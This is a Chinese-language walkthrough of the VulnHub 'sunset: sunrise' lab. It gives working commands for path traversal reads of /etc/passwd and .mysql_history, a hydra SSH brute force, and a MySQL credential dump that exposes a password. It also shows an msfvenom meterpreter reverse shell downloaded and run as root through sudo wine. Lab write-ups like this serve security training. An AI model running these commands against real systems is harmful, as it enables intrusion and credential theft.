[vulnhub]sunset: sunrise Writeup

编程入门 行业动态 更新时间:2024-10-26 09:23:43

个人博客地址

darkerbox.

欢迎大家学习交流

靶机网址:

vulnhub./entry/sunset-sunrise,406/

靶机知识点:

靶机IP:192.168.2.129
kali IP:192.168.2.126

信息收集

nmap -sV -p- 192.168.2.129


扫目录发现啥也没有

访问8080端口,很明显的目录遍历漏洞。

漏洞利用

通过这个漏洞读取/etc/passwd文件。斜杠需要经过url编码。

192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

发现用户weborf

使用hydra 爆破

hydra -l weborf -P /usr/share/wordlists/rockyou.txt 192.168.2.129 ssh

等了几分钟,啥也没有。

还是继续去目录遍历吧。
去home下看看。

192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f


有两个目录。先去第一个。

192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f


发现user.txt。

192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
第二个目录weborf

192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f


里面我看过了,没啥东西。

dirb扫描home/weborf下的文件。可能会有隐藏文件

dirb 192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

看到.mysql_history文件
访问它。

192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history


看见数据库的账号和密码
尝试ssh登陆,登陆成功

权限提升

mysql -u weborf -p
use mysql
select user,password from user;

得到sunrise的密码thefutureissobrightigottawearshades

sudo -l


查看可以以root执行wine命令,wine可以执行exe程序。
先在kali中生成exe程序

msfvenom -p windows/meterpreter/reverse_tcp -f exe   --platform windows -a x86 LHOST=192.168.2.126 LPORT=6666 -o /root/Desktop/payload.exe
python3 -m http.server


在靶机中下载

cd /tmp
wget 192.168.2.126:8000/payload.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.126
set LPORT 6666
exploit

在靶机运行

sudo wine payload.exe



欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

更多推荐

sunset,vulnhub,Writeup,sunrise

本文发布于:2023-05-25 10:57:51,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/226654.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:sunset   vulnhub   Writeup   sunrise

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!